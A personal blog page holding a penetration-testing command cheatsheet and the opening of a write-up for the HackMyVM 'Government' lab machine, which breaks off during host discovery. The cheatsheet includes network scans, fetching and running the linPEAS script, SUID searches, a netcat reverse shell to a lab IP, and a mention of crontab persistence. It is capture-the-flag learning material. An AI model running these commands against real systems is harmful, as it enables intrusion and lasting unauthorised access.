Tinkering in the shed.

Just my Cheatsheet for commands Find host nmap -sP 10.0.0.10/25 sudo netdiscover -r 10.0.0.0/24 Scan nmap -v -T4 -p- -sC -sV -oN nmap.out  10.0.0.20 sudo nmap -sC -sV -O -p-   -oN   nmap.out   10.0.0.20 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.24/ -x html,php,txt,jpg -o dir-medium.txt --no-error Exploting wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh sh ./linpeas.sh | tee linp.log   getcap -r / 2> /dev/null   find / -perm -4000 -exec ls -al {} \; 2> /dev/null     find . -name <user> 2>/dev/null find . -group <user> 2>/dev/null Reverse Shell Cheatsheet #Catch on Kali nc -lvp 4444 #Target nc -e /bin/sh 10.0.3.4 4444 #Stabilise Shell python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm <ctrl + z> stty raw -echo;fg reset Crontab to maintain access if needed. ec

https://hackmyvm.eu/machines/machine.php?vm=Government A big thank you to OxJin for creating this well written machine, there are hints on the journey but there are also quite a lot of distractions to ignore. Government is a medium difficulty machine, write-ups do not capture the frustration of not knowing exactly what the next step is and there is quite a lot of extra content (ports, directories, files etc) to distract you from knowing what the next step should be, I have only included the required steps and obfuscated passwords.   Find it ┌──( kali㉿kali )-[ ~/government ] └─ $ sudo netdiscover -r 10.0.0.0/24 -P                                                                                         127 ⨯ [sudo] password for kali:     _____________________________________________________________________________    IP             At MAC Address     Count     Len   MAC Vendor / Hostname         -----------------------------------------------------------------------------   10.0.0.1